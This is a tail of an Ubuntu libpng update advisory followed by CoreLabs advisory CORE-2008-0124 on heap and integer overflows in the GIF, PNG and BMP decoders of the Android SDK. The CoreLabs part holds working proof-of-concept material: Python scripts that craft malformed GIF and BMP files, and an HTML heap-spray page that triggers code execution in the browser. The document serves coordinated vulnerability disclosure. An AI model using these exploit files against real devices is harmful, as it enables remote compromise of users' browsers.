Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libpng12-0 1.2.8rel-5ubuntu0.2
Ubuntu 6.10:
libpng12-0 1.2.8rel-5.1ubuntu0.2
Ubuntu 7.04:
libpng12-0 1.2.15~beta5-1ubuntu1
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Details follow:
It was discovered that libpng did not correctly handle corrupted CRC
in grayscale PNG images.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz
Size/MD5: 16483 713a6e035fa256e4cb822fb5fc88769b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc
Size/MD5: 652 bc4f3f785816684c54d62947d53bc0db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb
Size/MD5: 846 76eab5d9a96efa186d66cf299a4f6032
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb
Size/MD5: 69484 078e25586525c4e83abf08c736fa6bd8
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb
Size/MD5: 113888 46fce5d27ac4b2dea9cf4deb633f824e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb
Size/MD5: 247528 68879285068cda170eef5a5f56594a1c
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb
Size/MD5: 66932 12cafbea44a3e7cf109eb24cb47aa557
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb
Size/MD5: 111396 3a93335c2a072b2e2c94bc2cc0b3d77e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb
Size/MD5: 239662 64029c30dac5152c97e1a0d864c981d0
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb
Size/MD5: 66304 0cbf98391b6c3219f83cd24cefe0343c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb
Size/MD5: 110828 62c7a8ccc58c86414bcd170c394f8240
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb
Size/MD5: 245220 1171c8638ec8ebc2c81f53706885b692
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb
Size/MD5: 63824 e66313895e489a36c2f438343fa3e0d4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb
Size/MD5: 108534 73ccb876f761c76b3518b8ca81e80485
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb
Size/MD5: 240048 5b19c41bbc639ee717fdacd4d81533e1
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz
Size/MD5: 16597 4ff19b636ab120a3fc4cee767171aa4f
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc
Size/MD5: 659 5769690df3c57a56d08aa8bf11013a42
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb
Size/MD5: 888 44f3267b52e89fc605f350b4fc347e45
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb
Size/MD5: 68992 105702504b783f464dff9ddd48de5ab0
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb
Size/MD5: 113542 876f5c1a3a1f6b4bf828edcbabe0702e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb
Size/MD5: 247132 75d920fe60a5d4f356ccb43d8d5a98ed
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb
Size/MD5: 69932 53783b0d13fd194f8cc9f19e1edc63d7
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb
Size/MD5: 114634 1b40abad309e133326ffdce859734610
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb
Size/MD5: 242882 3dca0a0938a43308465c8987f1357160
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb
Size/MD5: 67606 088844733b580984e1a3b79001a27511
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb
Size/MD5: 112228 6024c0c9d455cfdaa8a38e89d6a53148
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb
Size/MD5: 246684 e45d2830ca5bdf0747ea0d436fafc20e
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb
Size/MD5: 64656 55d6e7740ec8a9eddcbbfdada56a5f63
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb
Size/MD5: 109396 0b522137b1f4b2a34f990efc9dbd81df
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb
Size/MD5: 241064 e679e908623c68c5865fbf2c24c46973
Updated packages for Ubuntu 7.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz
Size/MD5: 14344 16526f313e1ee650074edd742304ec53
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc
Size/MD5: 819 b28af76731dfe368e48dfcd554d7b583
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb
Size/MD5: 936 dcec28b3cf4b8ee22c6a1229fdbd2e84
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb
Size/MD5: 70656 b4fa5b37b54fee32dd7404c64b696192
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb
Size/MD5: 189594 7e36d8e73bd47dbb19afd7cd0099335a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb
Size/MD5: 179950 c575d8c9699c971ec7682e52e37590b7
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb
Size/MD5: 68246 c81ffc4cd0359a1ce1e73eb99d8608f6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb
Size/MD5: 187234 09dcea1e3394a6d25565b23774d805db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb
Size/MD5: 171520 ac3fb45b36ec32b1bac4734eef162c49
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb
Size/MD5: 70652 147c89e36570990d5e084fc3a8933ed2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb
Size/MD5: 189548 00b81b16632e789ab20bab04dbcd586c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb
Size/MD5: 179128 61c51aafc326420b202c0f2ce6d5abfd
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb
Size/MD5: 66396 faff3d313cdc64f273eda1a5d01c2e0a
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb
Size/MD5: 185312 249165d75936ab8cfc2fa1aef68a5ee6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb
Size/MD5: 173800 a40164cd4995c6ed795219157e6d598e
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007.
The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality.
Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.
*Vulnerable Packages*
. Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).
*Non-vulnerable Packages*
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.
The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.
Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
return GIF_ERROR;
...
}
- -----------/
We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5
- -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
...
}
- -----------/
Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int
,int)
Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
This security bug affects Android SDK m3-rc37a and earlier versions.
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'.
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
#
- -----------/
We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill
the heap with the white color '
0x00ffffff' we can load the Program Counter with the value at
'0xffffff+0x10'. The following python script will generate a BMP to
accomplish that:
/-----------
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
- -----------/
Opening the BMP file generated with this script inside a HTML page will
cause (sometimes, as it is dependent on an uninitialized variable) the
following output of the gdb debugger:
/-----------
(gdb) attach 1574
attach 1574
Attaching to program: /system/bin/app_process, process 1574
...
0xafe0d204 in __futex_wait () from /system/lib/libc.so
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb)
- -----------/
Here the browser process has jumped to the '0x00000000' address because
that is the value at 0x00ffffff+0x10. We can change this value using
common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach
the address '0xffffff' it is very slow and the default memory
configuration of Android will often abort the process before reaching
the desired point. To overcome this limitation for demonstration
purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work.
*Report Timeline*
. 2008-01-30: Vendor is notified that possibly exploitable
vulnerabilities where discovered and that an advisory draft is
available. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to
generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for
the open source community, but agree they can fix the problem on the
estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a
vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new
findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found
will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification. 2008-02-13: Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-=scheduled for February
27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory. A final review of the advisory is requested before its
release. The vendor indicates that the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and if Core should file the reported and any future bugs
in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to
the vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5)
. 2008-03-01: Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability. Vendor indicates that Android applications run with
the credentials of an unprivileged user which decreases the severity of
the issues found
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges
. 2008-03-04: Advisory CORE-2008-0124 is published.
*References*
[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2] "Android Comes to Life in Barcelona" - The Washington Post ,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html
[3] Android Developer Challenge - http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - Inforworld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008
http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html
[6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes
by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte.
Wiley; 2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification -
http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
